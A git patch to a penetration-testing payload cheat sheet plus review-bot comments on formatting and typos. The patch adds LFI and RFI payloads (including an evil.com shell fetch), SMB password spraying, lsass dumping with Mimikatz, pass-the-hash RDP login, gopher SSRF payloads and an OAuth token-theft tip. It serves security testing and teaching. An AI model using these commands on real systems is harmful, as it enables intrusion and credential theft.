From bab04f85879214dfe9366e9596f24e28872b05f1 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 12 May 2019 21:34:09 +0200 Subject: [PATCH] Masscan + AD password in description + ZSH revshell bugfix + Mimikatz lsass.dmp --- File Inclusion/README.md | 20 +++-- .../Active Directory Attack.md | 12 ++- .../Methodology_and_enumeration.md | 8 ++ .../Network Discovery.md | 81 +++++++++++-------- .../Reverse Shell Cheatsheet.md | 9 +++ .../Windows - Mimikatz.md | 19 +++++ .../Windows - Using credentials.md | 16 ++-- OAuth/README.md | 18 ++++- README.md | 2 +- Server Side Request Forgery/README.md | 7 ++ XSS Injection/README.md | 1 - 11 files changed, 144 insertions(+), 49 deletions(-) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 2d8e3d4..1f48d44 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -7,6 +7,10 @@ ## Summary * [Basic LFI](#basic-lfi) + * [Null byte](#null-byte) + * [Double encoding](#double-encoding) + * [Path truncation](#path-truncation) + * [Filter bypass tricks](#filter-bypass-tricks) * [Basic RFI](#basic-rfi) * [LFI / RFI using wrappers](#lfi--rfi-using-wrappers) * [Wrapper php://filter](#wrapper-phpfilter) 
@@ -31,27 +35,30 @@ In the following examples we include the `/etc/passwd` file, check the `Director http://example.com/index.php?page=../../../etc/passwd ``` -Null byte +### Null byte ```powershell http://example.com/index.php?page=../../../etc/passwd%00 ``` -Double encoding +### Double encoding ```powershell http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00 ``` -Path truncation +### Path truncation + +On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away. ```powershell http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\. +http://example.com/index.php?page=../../../etc/passwd/././././././././/././././././././././[ADD MORE] http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd ``` -Filter bypass tricks +### Filter bypass tricks ```powershell http://example.com/index.php?page=....//....//etc/passwd @@ -65,13 +72,13 @@ http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C http://example.com/index.php?page=http://evil.com/shell.txt ``` -Null byte +### Null byte ```powershell http://example.com/index.php?page=http://evil.com/shell.txt%00 ``` -Double encoding +### Double encoding ```powershell http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt 
@@ -285,3 +292,4 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s * [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/) * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf) * [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/) +* [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 7c7e7d5..30de1a2 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -307,6 +307,8 @@ cme smb 10.10.0.202 -u username -p password --ntds vss enum4linux | grep -i desc There are 3-4 fields that seem to be common in most AD schemas: UserPassword, UnixUserPassword, unicodePwd and msSFU30Password. + +Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID ``` ### PassTheTicket Golden Tickets 
@@ -563,13 +565,21 @@ Alternatively you can use the Metasploit module ### Password spraying -Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing. +Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. + +Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing. ```powershell root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123 ``` +Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network. + +```powershell +crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)` +``` + Most of the time the best passwords to spray are : - Password1 diff --git a/Methodology and Resources/Methodology_and_enumeration.md b/Methodology and Resources/Methodology_and_enumeration.md index 675c08c..65cd22d 100644 --- a/Methodology and Resources/Methodology_and_enumeration.md +++ b/Methodology and Resources/Methodology_and_enumeration.md @@ -8,6 +8,7 @@ * The Harvester * [Active Recon](#active-recon) + * Masscan * Nmap * Nmap Script * RPCClient @@ -47,6 +48,13 @@ ## Active recon +* Masscan + +```powershell +masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out +masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000 +``` + * Basic NMAP ```bash diff --git a/Methodology and Resources/Network Discovery.md b/Methodology and Resources/Network Discovery.md index cd53bae..1a0b976 100644 --- a/Methodology and Resources/Network Discovery.md +++ b/Methodology and Resources/Network Discovery.md 
@@ -1,38 +1,14 @@ # Network Discovery -## Netdiscover +## Summary -```powershell -netdiscover -i eth0 -r 192.168.1.0/24 -Currently scanning: Finished! | Screen View: Unique Hosts - -20 Captured ARP Req/Rep packets, from 4 hosts. Total size: 876 -_____________________________________________________________________________ -IP At MAC Address Count Len MAC Vendor / Hostname ------------------------------------------------------------------------------ -192.168.1.AA 68:AA:AA:AA:AA:AA 15 630 Sagemcom -192.168.1.XX 52:XX:XX:XX:XX:XX 1 60 Unknown vendor -192.168.1.YY 24:YY:YY:YY:YY:YY 1 60 QNAP Systems, Inc. -192.168.1.ZZ b8:ZZ:ZZ:ZZ:ZZ:ZZ 3 126 HUAWEI TECHNOLOGIES CO.,LTD -``` - -## Responder - -```powershell -responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding. -responder.py -I eth0 -wrf -``` - -Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows) - -## Bettercap - -```powershell -bettercap -X --proxy --proxy-https -T -# better cap in spoofing, discovery, sniffer -# intercepting http and https requests, -# targetting specific IP only -``` +- [Nmap](#nmap) +- [Masscan](#masscan) +- [Netdiscover](#netdiscover) +- [Responder](#responder) +- [Bettercap](#bettercap) +- [Reconnoitre](#reconnoitre) +- [References](#references) ## Nmap @@ -121,6 +97,13 @@ Host script results: List Nmap scripts : ls /usr/share/nmap/scripts/ ``` +## Masscan + +```powershell +masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out +masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000 +``` + ## Reconnoitre Dependencies: 
@@ -135,6 +118,40 @@ python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostna If you have a segfault with nbtscan, read the following quote. > Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255 +## Netdiscover + +```powershell +netdiscover -i eth0 -r 192.168.1.0/24 +Currently scanning: Finished! | Screen View: Unique Hosts + +20 Captured ARP Req/Rep packets, from 4 hosts. Total size: 876 +_____________________________________________________________________________ +IP At MAC Address Count Len MAC Vendor / Hostname +----------------------------------------------------------------------------- +192.168.1.AA 68:AA:AA:AA:AA:AA 15 630 Sagemcom +192.168.1.XX 52:XX:XX:XX:XX:XX 1 60 Unknown vendor +192.168.1.YY 24:YY:YY:YY:YY:YY 1 60 QNAP Systems, Inc. +192.168.1.ZZ b8:ZZ:ZZ:ZZ:ZZ:ZZ 3 126 HUAWEI TECHNOLOGIES CO.,LTD +``` + +## Responder + +```powershell +responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding. +responder.py -I eth0 -wrf +``` + +Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows) + +## Bettercap + +```powershell +bettercap -X --proxy --proxy-https -T +# better cap in spoofing, discovery, sniffer +# intercepting http and https requests, +# targetting specific IP only +``` + ## References * [TODO](TODO) \ No newline at end of file diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 1eccf12..41435de 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md 
@@ -234,13 +234,22 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new ## Spawn TTY Shell Access shortcuts, su, nano and autocomplete in a partially tty shell + /!\ OhMyZSH might break this trick, a simple `sh` is recommended +> The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. [...] stty raw -echo; fg[...] If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect + ```powershell ctrl+z echo $TERM && tput lines && tput cols + +# for bash stty raw -echo fg + +# for zsh +stty raw -echo; fg + reset export SHELL=bash export TERM=xterm-256color diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index 6df9c14..9e1f869 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -26,6 +26,25 @@ mimikatz_command -f sekurlsa::logonPasswords full mimikatz_command -f sekurlsa::wdigest ``` +## Mimikatz - Mini Dump + +Dump the lsass process. + +```powershell +C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp + +net use Z: https://live.sysinternals.com +Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp +``` + +Then load it inside Mimikatz. + +```powershell +mimikatz # sekurlsa::minidump lsass.dmp +Switch to minidump +mimikatz # sekurlsa::logonPasswords +``` + ## Mimikatz Golden ticket ```powershell diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 92378f9..a2d0ed3 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md 
@@ -119,18 +119,20 @@ or with crackmapexec crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable ``` -For Server 2012 R2, Win8.1+ - -```powershell -xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:192.168.1.12 -``` - -with Metasploit +or with Metasploit ```powershell run getgui -u admin -p 1234 ``` +Then log in using xfreerdp + +```powershell +xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+ + xfreerd /u:runner /v:10.0.0.1 # password will be asked +``` + + ## Netuse (Windows) ```powershell diff --git a/OAuth/README.md b/OAuth/README.md index 7df46e6..4e728c5 100644 --- a/OAuth/README.md +++ b/OAuth/README.md @@ -1,4 +1,20 @@ -# OAuth 2 - Common vulnerabilities +# OAuth + +## Summary + +- [Stealing OAuth Token via referer](#stealing-oauth-token-via-referer) +- [Grabbing OAuth Token via redirect_uri](#grabbing-oauth-token-via-redirect---uri) +- [Executing XSS via redirect_uri](#executing-xss-via-redirect---uri) +- [OAuth private key disclosure](#oauth-private-key-disclosure) +- [Authorization Code Rule Violation](#authorization-code-rule-violation) +- [Cross-Site Request Forgery](#cross-site-request-forgery) +- [References](#references) + +## Stealing OAuth Token via referer + +From [@abugzlife1](https://twitter.com/abugzlife1/status/1125663944272748544) tweet. + +> Do you have HTML injection but can't get XSS? Are there any OAuth implementations on the site? If so, setup an img tag to your server and see if there's a way to get the victim there (redirect, etc.) after login to steal OAuth tokens via referer ## Grabbing OAuth Token via redirect_uri diff --git a/README.md b/README.md index be60cf8..9af9fce 100644 --- a/README.md +++ b/README.md 
@@ -2,7 +2,7 @@ A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! -I <3 pull requests :) +I :heart: pull requests :) You can also contribute with a beer IRL or with `buymeacoffee.com` diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 0c9090a..4d01e10 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -277,6 +277,13 @@ You didn't say the magic word ! QUIT ``` +#### Gopher HTTP + +```powershell +gopher://:8080/_GET http:///x HTTP/1.1%0A%0A +gopher://:8080/_POST%20http://:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body +``` + #### Gopher SMTP - Back connect to 1337 ```php diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 29bc724..23b8b18 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -930,7 +930,6 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld - [Three Stored XSS in Facebook](http://www.breaksec.com/?p=6129) by Nirgoldshlager - [Using a Braun Shaver to Bypass XSS Audit and WAF](https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify) by Frans Rosen - [An XSS on Facebook via PNGs & Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/) by Jack Whitton - - he is able to make stored XSS from a irrelevant domain to main facebook domain - [Stored XSS in *.ebay.com](https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/) by Jack Whitton - [Complicated, Best Report of Google XSS](https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss) by Ramzes - [Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com](https://hackerone.com/reports/150179) by secgeek
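Review bot: In the File Inclusion summary hunk (`@@ -7,6 +7,10 @@`), the new links `#null-byte` and `#double-encoding` will only ever resolve to the first `### Null byte` / `### Double encoding` headings under Basic LFI, because the next hunk adds headings with the same text under Basic RFI and GitHub gives the second copy a suffixed slug (`#null-byte-1`). Either make the RFI headings distinct (for example "Null byte (RFI)") or add a second pair of summary links for the RFI section.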
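Review bot: In the path truncation hunk (`@@ -31,27 +35,30 @@` of File Inclusion/README.md), the sentence "On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away." overstates the scope and needs punctuation: 4096 is the Linux `PATH_MAX`, and whether the excess is silently dropped depends on the PHP version and platform, so qualify the claim ("On older PHP builds on Linux, paths longer than 4096 bytes are truncated, so any excess characters are discarded."). The rest of the hunk (promoting the labels to `###` headings) is fine.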
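Review bot: In the Active Directory hunk (`@@ -307,6 +309,8 @@`), the added `Get-WmiObject` line lands inside the fence that already holds the Linux `enum4linux` command and the prose sentence "There are 3-4 fields that seem to be common in most AD schemas ...", so the sentence renders as code and two tools from different platforms share one block. Close the fence after the `enum4linux` line, move the sentence outside it, and open a separate `powershell` fence for the WMI query. Minor: `PasswordRequired,PasswordChangeable` lacks the space after the comma that the other property names in the `Select` list have.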
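Review bot: In the password spraying hunk (`@@ -563,13 +565,21 @@`), the command substitution is written with backticks, `-p `(./mp64.bin Pass@wor?l?a)``, which inside a fenced block reads as literal backticks and is easy to misread; write it as `$(./mp64.bin Pass@wor?l?a)` so the intent is unambiguous. The sentence before it should also say what `mp64` is (hashcat's maskprocessor) since the rest of the page never introduces it.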
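Review bot: In the Methodology_and_enumeration.md hunk (`@@ -47,6 +48,13 @@`), the new Masscan fence is tagged `powershell` while the adjacent "Basic NMAP" block in the same file is tagged `bash`; use one tag for both. Please also verify the `--only-open` flag against `masscan --help`: the masscan man page documents it as `--open-only` (alias `--open`). Finally, these two `masscan` lines are added verbatim a second time to Network Discovery.md in this same patch; keep one copy and link to it from the other file so the two do not drift apart.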
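Review bot: In the Network Discovery summary hunk (`@@ -1,38 +1,14 @@`), the summary lists Reconnoitre after Bettercap, but after the moves in this patch the sections appear as Nmap, Masscan, Reconnoitre, Netdiscover, Responder, Bettercap, References; order the summary to match the file. The `[References](#references)` entry also points at a section that still holds only `* [TODO](TODO)`, so either fill it or drop the link until there is something to reference.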
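Review bot: In the Network Discovery move hunk (`@@ -135,6 +118,40 @@`), the Bettercap block is re-added with its existing typos intact (`# better cap in spoofing, discovery, sniffer` and `# targetting specific IP only`); since the block is being rewritten anyway, correct them to `bettercap` and `targeting`. The file also still ends with `\ No newline at end of file` after `* [TODO](TODO)`, which this hunk could have fixed by adding the trailing newline.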
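Review bot: In the Reverse Shell Cheatsheet hunk (`@@ -234,13 +234,22 @@`), the `>` blockquote explaining why zsh needs `stty raw -echo; fg` on one line carries no source, unlike the OAuth tweet quoted later in this same patch; add the attribution link so readers can tell whose explanation it is. The bugfix itself (separate `# for bash` and `# for zsh` variants) is a clear improvement.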
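Review bot: In the Mimikatz hunk (`@@ -26,6 +26,25 @@`), the line `Switch to minidump` inside the second fence is mimikatz's output, not a command, but nothing distinguishes it from the two `mimikatz #` prompts around it; mark it as output (or drop it) so a reader does not type it. The new heading `## Mimikatz - Mini Dump` also breaks the style of the existing `## Mimikatz Golden ticket` heading; `## Mimikatz Mini Dump` would match.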
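Review bot: In the Windows - Using credentials hunk (`@@ -119,18 +119,20 @@`), the second command is broken: ` xfreerd /u:runner /v:10.0.0.1 # password will be asked` has a leading space and the binary name is misspelled (`xfreerd` for `xfreerdp`). There are also two blank lines before `## Netuse (Windows)` where the rest of the file uses one.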
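Review bot: In the OAuth hunk (`@@ -1,4 +1,20 @@`), the summary anchors `#grabbing-oauth-token-via-redirect---uri` and `#executing-xss-via-redirect---uri` are unlikely to resolve: GitHub keeps underscores when it slugs headings, so `## Grabbing OAuth Token via redirect_uri` becomes `#grabbing-oauth-token-via-redirect_uri`. Check them against the rendered page. The new "Stealing OAuth Token via referer" section would also benefit from one line on the mitigation it implies (a restrictive `Referrer-Policy` and not carrying tokens in URLs), which the section currently leaves to the reader.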
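Review bot: In the SSRF hunk (`@@ -277,6 +277,13 @@`), both Gopher HTTP lines have empty hosts (`gopher://:8080/_GET http:///x HTTP/1.1%0A%0A` and `gopher://:8080/_POST%20http://:80/x%20...`), which looks like angle-bracket placeholders were stripped when the text was pasted; use a placeholder that survives Markdown, such as `HOST`. The fence is also tagged `powershell` while the neighbouring "Gopher SMTP" block is tagged `php`; pick one tag for the Gopher section.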
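Review bot: In the XSS Injection hunk (`@@ -930,7 +930,6 @@`), the deleted line `- he is able to make stored XSS from a irrelevant domain to main facebook domain` was the one-line description for the Jack Whitton Facebook entry above it; if the goal was to fix the malformed sub-bullet, append the text to that bullet after the author name rather than dropping it, since the other entries in the list keep their descriptions.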